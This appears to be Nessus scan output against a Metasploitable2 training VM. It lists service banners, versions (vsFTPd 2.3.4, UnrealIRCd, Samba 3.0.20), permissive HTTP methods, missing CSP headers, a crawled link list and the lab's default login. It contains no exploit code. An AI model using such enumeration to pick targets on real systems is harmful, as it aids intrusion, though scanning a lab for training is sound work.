http://jakarta.apache.org/site/vendors.html - /tomcat-docs/developers.html
http://jakarta.apache.org/slide/ - /webdav/index.html
http://jakarta.apache.org/struts/ - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://jakarta.apache.org/taglibs/doc/standard-doc/intro.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://jakarta.apache.org/tomcat/ - /jsp-examples/
http://jakarta.apache.org/tomcat/tomcat-5.5-doc/ - /tomcat-docs/catalina/docs/api/index.html
http://java.sun.com/Series/Tutorial/java/threads/multithreaded.html - /tomcat-docs/servletapi/javax/servlet/Servlet.html
http://java.sun.com/j2ee - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/j2ee/blueprints/ - /tomcat-docs/appdev/introduction.html
http://java.sun.com/j2ee/download.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/j2se/ - /tomcat-docs/building.html
http://java.sun.com/j2se/1.3/docs/guide/jdbc/spec2/jdbc2.1.frame.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/j2se/1.4.1/docs/guide/security/jaas/JAASLMDevGuide.html - /tomcat-docs/realm-howto.html
http://java.sun.com/j2se/1.4.1/docs/guide/security/jaas/tutorials/GeneralAcnOnly.html - /tomcat-docs/realm-howto.html
http://java.sun.com/j2se/1.4.1/docs/guide/security/jaas/tutorials/LoginConfigFile.html - /tomcat-docs/realm-howto.html
http://java.sun.com/j2se/1.4.2/docs/api/java/util/logging/Filter.html - /tomcat-docs/logging.html
http://java.sun.com/j2se/1.4.2/docs/api/java/util/logging/Formatter.html - /tomcat-docs/logging.html
http://java.sun.com/j2se/1.4.2/docs/api/java/util/logging/Level.html - /tomcat-docs/logging.html
http://java.sun.com/j2se/1.4/docs/guide/standards/index.html - /tomcat-docs/class-loader-howto.html
http://java.sun.com/j2se/1.5.0/docs/guide/management/agent.html - /tomcat-docs/monitoring.html
http://java.sun.com/products/JavaManagement/index.html - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://java.sun.com/products/javabeans/glasgow/jaf.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/javamail - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/javamail/downloads/index.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jdbc/ - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jdbc/jdbc20.stdext.pdf - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jdk/1.2/docs/tooldocs/solaris/policytool.html - /tomcat-docs/security-manager-howto.html
http://java.sun.com/products/jdk/idl/index.html - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://java.sun.com/products/jndi/ - /tomcat-docs/catalina/funcspecs/fs-jndi-realm.html
http://java.sun.com/products/jndi/#download - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jndi/docs.html - /tomcat-docs/realm-howto.html
http://java.sun.com/products/jsp - /
http://java.sun.com/products/jsp/ - /tomcat-docs/introduction.html
http://java.sun.com/products/jsp/download.html - /tomcat-docs/appdev/introduction.html
http://java.sun.com/products/jsp/jstl - /tomcat-docs/jndi-datasource-examples-howto.html
http://java.sun.com/products/jsse/ - /tomcat-docs/ssl-howto.html
http://java.sun.com/products/rmi/index.html - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://java.sun.com/products/servlet - /
http://java.sun.com/products/servlet/ - /tomcat-docs/introduction.html
http://java.sun.com/products/servlet/download.html - /tomcat-docs/
http://java.sun.com/security/ - /tomcat-docs/security-manager-howto.html
http://java.sun.com/security/seccodeguide.html - /tomcat-docs/security-manager-howto.html
http://java.sun.com/webservices/downloads/webservicespack.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://localhost:8080/jsp-examples/jsp2/jspx/textRotate.jspx?name=JSPX - /jsp-examples/jsp2/jspx/svgexample.html
http://localhost:8080/jsp-examples/security/protected/ - /tomcat-docs/realm-howto.html
http://localhost:8080/sample - /tomcat-docs/appdev/sample/
http://logging.apache.org/log4j - /tomcat-docs/logging.html
http://logging.apache.org/log4j/docs/documentation.html - /tomcat-docs/logging.html
http://mail-archives.apache.org/mod_mbox/tomcat-dev/ - /
http://mail-archives.apache.org/mod_mbox/tomcat-users/ - /
http://marc.theaimsgroup.com/?l=tomcat-dev&w=2&r=1&s=5.next&q=b - /tomcat-docs/status.html
http://metasploitable2.sicurform:8180/admin/error.jsp - /admin/j_security_check
http://metasploitable2.sicurform:8180/admin/login.jsp - /admin/
http://mmmysql.sourceforge.net - /tomcat-docs/jndi-datasource-examples-howto.html
http://oss.software.ibm.com/developerworks/opensource/jikes/ - /tomcat-docs/jasper-howto.html
http://otn.oracle.com/ - /tomcat-docs/jndi-datasource-examples-howto.html
http://tomcat.apache.org/ - /
http://tomcat.apache.org/bugreport.html - /
http://tomcat.apache.org/connectors-doc/ - /tomcat-docs/
http://tomcat.apache.org/connectors-doc/index.html - /tomcat-docs/
http://tomcat.apache.org/download-55.cgi - /tomcat-docs/appdev/installation.html
http://tomcat.apache.org/faq - /tomcat-docs/
http://tomcat.apache.org/faq/ - /
http://tomcat.apache.org/faq/cluster.html - /tomcat-docs/cluster-howto.html
http://tomcat.apache.org/lists.html - /tomcat-docs/introduction.html
http://tomcat.apache.org/tomcat-5.5-doc/catalina/funcspecs/fs-admin-opers.html - /tomcat-docs/monitoring.html
http://tomcat.apache.org/tomcat-5.5-doc/catalina/funcspecs/mbean-names.html - /tomcat-docs/monitoring.html
http://tomcat.heanet.ie/native/ - /tomcat-docs/apr.html
http://wiki.apache.org/tomcat/ - /tomcat-docs/introduction.html
http://www.apache.org/ - /
http://www.cvshome.org - /tomcat-docs/appdev/installation.html
http://www.gnu.org/software/classpath/cp-tools/ - /tomcat-docs/servletapi/about.html
http://www.google.com/search?q=tomcat+mailing+list+archives - /tomcat-docs/introduction.html
http://www.ics.uci.edu/pub/ietf/webdav/ - /webdav/index.html
http://www.ietf.org/rfc/rfc2045.txt - /tomcat-docs/servletapi/javax/servlet/ServletResponse.html
http://www.jcp.org - /tomcat-docs/
http://www.jcp.org/en/jsr/detail?id=196 - /tomcat-docs/realm-howto.html
http://www.jcp.org/jsr/detail/152.jsp - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://www.jcp.org/jsr/detail/154.jsp - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://www.jguru.com/faq/home.jsp?topic=Tomcat - /tomcat-docs/introduction.html
http://www.mysql.com/products/connector-j - /tomcat-docs/jndi-datasource-examples-howto.html
http://www.mysql.com/products/mysql/index.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://www.openldap.org - /tomcat-docs/realm-howto.html
http://www.openssl.org - /tomcat-docs/apr.html
http://www.openssl.org/ - /tomcat-docs/ssl-howto.html
http://www.rfc-editor.org/rfc/rfc2046.txt - /tomcat-docs/catalina/funcspecs/fs-default.html
http://www.rfc-editor.org/rfc/rfc2616.txt - /tomcat-docs/catalina/funcspecs/fs-default.html
http://www.webdav.org - /webdav/index.html
http://www.webdav.org/projects/ - /webdav/index.html
http://xml.apache.org/batik/index.html - /jsp-examples/jsp2/jspx/svgexample.html

An FTP server is listening on a remote port.

It is possible to obtain the banner of the remote FTP server by connecting to a remote port.

n/a

None

Published: 1999/10/12, Modified: 2023/08/17

The remote FTP banner is :

220 (vsFTPd 2.3.4)

An FTP server is listening on a remote port.

It is possible to obtain the banner of the remote FTP server by connecting to a remote port.

n/a

None

Published: 1999/10/12, Modified: 2023/08/17

The remote FTP banner is :

220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.19.0.2]

This plugin determines which HTTP methods are allowed on various CGI directories.

By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory.

The following HTTP methods are considered insecure:
PUT, DELETE, CONNECT, TRACE, HEAD

Many frameworks and languages treat 'HEAD' as a 'GET' request, albeit one without any body in the response. If a security constraint was set on 'GET' requests such that only 'authenticatedUsers' could access GET requests for a particular servlet or resource, it would be bypassed for the 'HEAD' version. This allowed unauthorized blind submission of any privileged GET request.

As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes'
in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501.

Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities.

n/a

None

Published: 2009/12/10, Modified: 2022/04/11

Based on the response to an OPTIONS request :

- HTTP methods COPY DELETE GET HEAD LOCK MOVE OPTIONS POST PROPFIND
PROPPATCH TRACE UNLOCK are allowed on :

/dav

- HTTP methods GET HEAD OPTIONS POST TRACE are allowed on :

/doc
/dvwa/dvwa
/dvwa/dvwa/css
/dvwa/dvwa/images
/dvwa/dvwa/includes
/dvwa/dvwa/includes/DBMS
/dvwa/dvwa/js
/icons
/mutillidae/documentation
/mutillidae/styles
/mutillidae/styles/ddsmoothmenu
/test
/test/testoutput
/twiki

This plugin determines which HTTP methods are allowed on various CGI directories.

By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory.

The following HTTP methods are considered insecure:
PUT, DELETE, CONNECT, TRACE, HEAD

Many frameworks and languages treat 'HEAD' as a 'GET' request, albeit one without any body in the response. If a security constraint was set on 'GET' requests such that only 'authenticatedUsers' could access GET requests for a particular servlet or resource, it would be bypassed for the 'HEAD' version. This allowed unauthorized blind submission of any privileged GET request.

As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes'
in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501.

Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities.

n/a

None

Published: 2009/12/10, Modified: 2022/04/11

Based on the response to an OPTIONS request :

- HTTP methods DELETE HEAD OPTIONS POST PUT TRACE GET
are allowed on :

/admin/error.jsp
/host-manager
/jsp-examples
/jsp-examples/cal
/jsp-examples/checkbox
/jsp-examples/colors
/jsp-examples/dates
/jsp-examples/error
/jsp-examples/forward
/jsp-examples/include
/jsp-examples/jsp2
/jsp-examples/jsp2/el
/jsp-examples/jsp2/jspattribute
/jsp-examples/jsp2/jspx
/jsp-examples/jsp2/misc
/servlets-examples

A web server is running on the remote host.

This plugin attempts to determine the type and the version of the remote web server.

n/a

None

Published: 2000/01/04, Modified: 2020/10/30

The remote web server type is :

Apache/2.2.8 (Ubuntu) DAV/2

A web server is running on the remote host.

This plugin attempts to determine the type and the version of the remote web server.

n/a

None

Published: 2000/01/04, Modified: 2020/10/30

The remote web server type is :

Apache-Coyote/1.1

It was possible to resolve the name of the remote host.

Nessus was able to resolve the fully qualified domain name (FQDN) of the remote host.

n/a

None

Published: 2004/02/11, Modified: 2025/03/13

172.19.0.2 resolves as metasploitable2.sicurform.

Some information about the remote HTTP configuration can be extracted.

This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive is enabled, etc...

This test is informational only and does not denote any security problem.

n/a

None

Published: 2007/01/30, Modified: 2024/02/26

Response Code : HTTP/1.1 200 OK

Protocol version : HTTP/1.1
HTTP/2 TLS Support: No
HTTP/2 Cleartext Support: No
SSL : no
Keep-Alive : yes
Options allowed : (Not implemented)
Headers :

Date: Thu, 19 Jun 2025 09:39:40 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

Response Body :

<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>

_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


</pre>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/dav/">WebDAV</a></li>
</ul>
</body>
</html>

Some information about the remote HTTP configuration can be extracted.

This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive is enabled, etc...

This test is informational only and does not denote any security problem.

n/a

None

Published: 2007/01/30, Modified: 2024/02/26

Response Code : HTTP/1.1 200 OK

Protocol version : HTTP/1.1
HTTP/2 TLS Support: No
HTTP/2 Cleartext Support: No
SSL : no
Keep-Alive : no
Options allowed : GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Headers :

Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 19 Jun 2025 09:39:31 GMT
Connection: close

Response Body :

<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Apache Tomcat/5.5</title>
<style type="text/css">
/*<![CDATA[*/
body {
color: #000000;
background-color: #FFFFFF;
font-family: Arial, "Times New Roman", Times, serif;
margin: 10px 0px;
}

img {
border: none;
}

a:link, a:visited {
color: blue
}

th {
font-family: Verdana, "Times New Roman", Times, serif;
font-size: 110%;
font-weight: normal;
font-style: italic;
background: #D2A41C;
text-align: left;
}

td {
color: #000000;
font-family: Arial, Helvetica, sans-serif;
}

td.menu {
background: #FFDC75;
}

.center {
text-align: center;
}

.code {
color: #000000;
font-family: "Courier New", Courier, monospace;
font-size: 110%;
margin-left: 2.5em;
}

#banner {
margin-bottom: 12px;
}

p#congrats {
margin-top: 0;
font-weight: bold;
text-align: center;
}

p#footer {
text-align: right;
font-size: 80%;
}
/*]]>*/
</style>
</head>

<body>

<!-- Header -->
<table id="banner" width="100%">
<tr>
<td align="left" style="width:130px">
<a href="http://tomcat.apache.org/">
<img src="tomcat.gif" height="92" width="130" alt="The Mighty Tomcat - MEOW!"/>
</a>
</td>
<td align="left" valign="top"><b>Apache Tomcat/5.5</b></td>
<td align="right">
<a href="http://www.apache.org/">
<img src="asf-logo-wide.gif" height="51" width="537" alt="The Apache Software Foundation"/>
</a>
</td>
</tr>
</table>

<table>
<tr>

<!-- Table of Contents -->
<td valign="top">
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Administration</th>
</tr>
<tr>
<td class="menu">
<a href="manager/status">Status</a><br/>
<a href="admin">Tomcat&nbsp;Administration</a><br/>
<a href="manager/html">Tomcat&nbsp;Manager</a><br/>
&nbsp;
</td>
</tr>
</table>

<br />
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Documentation</th>
</tr>
<tr>
<td class="menu">
<a href="RELEASE-NOTES.txt">Release&nbsp;Notes</a><br/>
<a href="tomcat-docs/changelog.html">Change&nbsp;Log</a><br/>
<a href="tomcat-docs">Tomcat&nbsp;Documentation</a><br/> &nbsp;
&nbsp;
</td>
</tr>
</table>

<br/>
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Tomcat Online</th>
</tr>
<tr>
<td class="menu">
<a href="http://tomcat.apache.org/">Home&nbsp;Page</a><br/>
<a href="http://tomcat.apache.org/faq/">FAQ</a><br/>
<a href="http://tomcat.apache.org/bugreport.html">Bug&nbsp;Database</a><br/>
<a href="http://issues.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&amp;bug_status=NEW&amp;bug_status=ASSIGNED&amp;bug_status=REOPENED&amp;bug_status=RESOLVED&amp;resolution=LATER&amp;resolution=REMIND&amp;resolution=---&amp;bugidtype=include&amp;product=Tomcat+5&amp;cmdtype=doit&amp;order=Importance">Open Bugs</a><br/>
<a href="http://mail-archives.apache.org/mod_mbox/tomcat-users/">Users&nbsp;Mailing&nbsp;List</a><br/>
<a href="http://mail-archives.apache.org/mod_mbox/tomcat-dev/">Developers&nbsp;Mailing&nbsp;List</a><br/>
<a href="irc://irc.freenode.net/#tomcat">IRC</a><br/>
&nbsp;
</td>
</tr>
</table>

<br/>
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Examples</th>
</tr>
<tr>
<td class="menu">
<a href="jsp-examples/">JSP&nbsp;Examples</a><br/>
<a href="servlets-examples/">Servlet&nbsp;Examples</a><br/>
<a href="webdav/">WebDAV&nbsp;capabilities</a><br/>
&nbsp;
</td>
</tr>
</table>

<br/>
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Miscellaneous</th>
</tr>
<tr>
<td class="menu">
<a href="http://java.sun.com/products/jsp">Sun's&nbsp;Java&nbsp;Server&nbsp;Pages&nbsp;Site</a><br/>
<a href="http://java.sun.com/products/servlet">Sun's&nbsp;Servlet&nbsp;Site</a><br/>
&nbsp;
</td>
</tr>
</table>
</td>

<td style="width:20px">&nbsp;</td>

<!-- Body -->
<td align="left" valign="top">
<p id="congrats">If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!</p>

<p>As you may have guessed by now, this is the default Tomcat home page. It can be found on the local filesystem at:</p>
<p class="code">$CATALINA_HOME/webapps/ROOT/index.jsp</p>

<p>where "$CATALINA_HOME" is the root of the Tomcat installation directory. If you're seeing this page, and you don't think you should be, then either you're either a user who has arrived at new installation of Tomcat, or you're an administrator who hasn't got his/her setup quite right. Providing the latter is the case, please refer to the <a href="tomcat-docs">Tomcat Documentation</a> for more detailed setup and administration information than is found in the INSTALL file.</p>

<p><b>NOTE:</b> This page is precompiled. If you change it, this page will not change since
it was compiled into a servlet at build time.
(See <tt>$CATALINA_HOME/webapps/ROOT/WEB-INF/web.xml</tt> as to how it was mapped.)
</p>

<p><b>NOTE: For security reasons, using the administration webapp
is restricted to users with role "admin". The manager webapp
is restricted to users with role "manager".</b>
Users are defined in <code>$CATALINA_HOME/conf/tomcat-users.xml</code>.</p>

<p>Included with this release are a host of sample Servlets and JSPs (with associated source code), extensive documentation (including the Servlet 2.4 and JSP 2.0 API JavaDoc), and an introductory guide to developing web applications.</p>

<p>Tomcat mailing lists are available at the Tomcat project web site:</p>

<ul>
<li><b><a href="mailto:users@tomcat.apache.org">users@tomcat.apache.org</a></b> for general questions related to configuring and using Tomcat</li>
<li><b><a href="mailto:dev@tomcat.apache.org">dev@tomcat.apache.org</a></b> for developers working on Tomcat</li>
</ul>

<p>Thanks for using Tomcat!</p>

<p id="footer"><img src="tomcat-power.gif" width="77" height="80" alt="Powered by Tomcat"/><br/>
&nbsp;

Copyright &copy; 1999-2005 Apache Software Foundation<br/>
All Rights Reserved
</p>
</td>

</tr>
</table>

</body>
</html>

The remote host is an IRC server.

This plugin determines the version of the IRC daemon.

n/a

None

Published: 2002/11/19, Modified: 2016/01/08

The IRC server version is : Unreal3.2.8.1. FhiXOoE [*=2309]

It is possible to obtain network information.

It was possible to obtain the browse list of the remote Windows system by sending a request to the LANMAN pipe. The browse list is the list of the nearest Windows systems of the remote host.

n/a

None

Published: 2000/05/09, Modified: 2022/02/01

Here is the browse list of the remote host :

04CBEBC48A57 ( os : 0.0 )

It was possible to obtain information about the remote operating system.

Nessus was able to obtain the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. Note that this plugin requires SMB to be enabled on the host.

n/a

None

Published: 2001/10/17, Modified: 2021/09/20

The remote Operating System is : Unix
The remote native LAN manager is : Samba 3.0.20-Debian
The remote SMB Domain Name is : 04CBEBC48A57

A file / print sharing service is listening on the remote host.

The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network.

n/a

None

Published: 2002/06/05, Modified: 2021/02/11

An SMB server is running on this port.

A file / print sharing service is listening on the remote host.

The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network.

n/a

None

Published: 2002/06/05, Modified: 2021/02/11

A CIFS server is running on this port.

It was possible to obtain information about the version of SMB running on the remote host.

Nessus was able to obtain the version of SMB running on the remote host by sending an authentication request to port 139 or 445.

Note that this plugin is a remote check and does not work on agents.

n/a

None

Published: 2017/06/19, Modified: 2019/11/22

The remote host supports the following versions of SMB :
SMBv1

It was possible to obtain information about the dialects of SMB2 and SMB3 available on the remote host.

Nessus was able to obtain the set of SMB2 and SMB3 dialects running on the remote host by sending an authentication request to port 139 or 445.

n/a

None

Published: 2018/02/09, Modified: 2020/03/11

The remote host does NOT support the following SMB dialects :
_version_ _introduced in windows version_
2.0.2 Windows 2008
2.1 Windows 7
2.2.2 Windows 8 Beta
2.2.4 Windows 8 Beta
3.0 Windows 8
3.0.2 Windows 8.1
3.1 Windows 10
3.1.1 Windows 10

The remote web server does not take steps to mitigate a class of web application vulnerabilities.

The remote web server in some responses sets a permissive Content-Security-Policy (CSP) frame-ancestors response header or does not set one at all.

The CSP frame-ancestors header has been proposed by the W3C Web Application Security Working Group as a way to mitigate cross-site scripting and clickjacking attacks.

Set a non-permissive Content-Security-Policy frame-ancestors header for all requested resources.

None

Published: 2010/10/26, Modified: 2021/01/19

The following pages do not set a Content-Security-Policy frame-ancestors response header or set a permissive policy:

- http://metasploitable2.sicurform/
- http://metasploitable2.sicurform/dav/
- http://metasploitable2.sicurform/dvwa/dvwa/
- http://metasploitable2.sicurform/dvwa/dvwa/css/
- http://metasploitable2.sicurform/dvwa/dvwa/images/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/DBMS.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/MySQL.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPage.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPhpIds.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/js/
- http://metasploitable2.sicurform/dvwa/login.php
- http://metasploitable2.sicurform/mutillidae/
- http://metasploitable2.sicurform/mutillidae/documentation/
- http://metasploitable2.sicurform/mutillidae/documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php
- http://metasploitable2.sicurform/mutillidae/documentation/vulnerabilities.php
- http://metasploitable2.sicurform/mutillidae/framer.html
- http://metasploitable2.sicurform/mutillidae/index.php
- http://metasploitable2.sicurform/mutillidae/set-up-database.php
- http://metasploitable2.sicurform/mutillidae/styles/
- http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/
- http://metasploitable2.sicurform/phpMyAdmin/
- http://metasploitable2.sicurform/phpMyAdmin/index.php
- http://metasploitable2.sicurform/test/
- http://metasploitable2.sicurform/test/testoutput/
- http://metasploitable2.sicurform/twiki/
- http://metasploitable2.sicurform/twiki/TWikiHistory.html
- http://metasploitable2.sicurform/twiki/bin/oops
- http://metasploitable2.sicurform/twiki/bin/oops/Main
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour/company
- http://metasploitable2.sicurform/twiki/bin/search
- http://metasploitable2.sicurform/twiki/bin/search/Main
- http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult
- http://metasploitable2.sicurform/twiki/bin/view
- http://metasploitable2.sicurform/twiki/bin/view/Main
- http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome

The remote web server does not take steps to mitigate a class of web application vulnerabilities.

The remote web server in some responses sets a permissive Content-Security-Policy (CSP) frame-ancestors response header or does not set one at all.

The CSP frame-ancestors header has been proposed by the W3C Web Application Security Working Group as a way to mitigate cross-site scripting and clickjacking attacks.

Set a non-permissive Content-Security-Policy frame-ancestors header for all requested resources.

None

Published: 2010/10/26, Modified: 2021/01/19

The following pages do not set a Content-Security-Policy frame-ancestors response header or set a permissive policy:

- http://metasploitable2.sicurform:8180/
- http://metasploitable2.sicurform:8180/admin/
- http://metasploitable2.sicurform:8180/admin/error.jsp
- http://metasploitable2.sicurform:8180/admin/j_security_check
- http://metasploitable2.sicurform:8180/jsp-examples/
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entries.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entry.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/TableBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal2.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/calendar.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/login.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/CheckTest.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/check.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/cresult.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/ColorGameBean.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/clr.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colors.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/er.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/error.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/fwd.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/inc.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/index.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/Functions.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/FooBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/HelloWorldSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/ShuffleSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/TileSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/svgexample.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.jspx.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/EchoAttributesTag.java.html
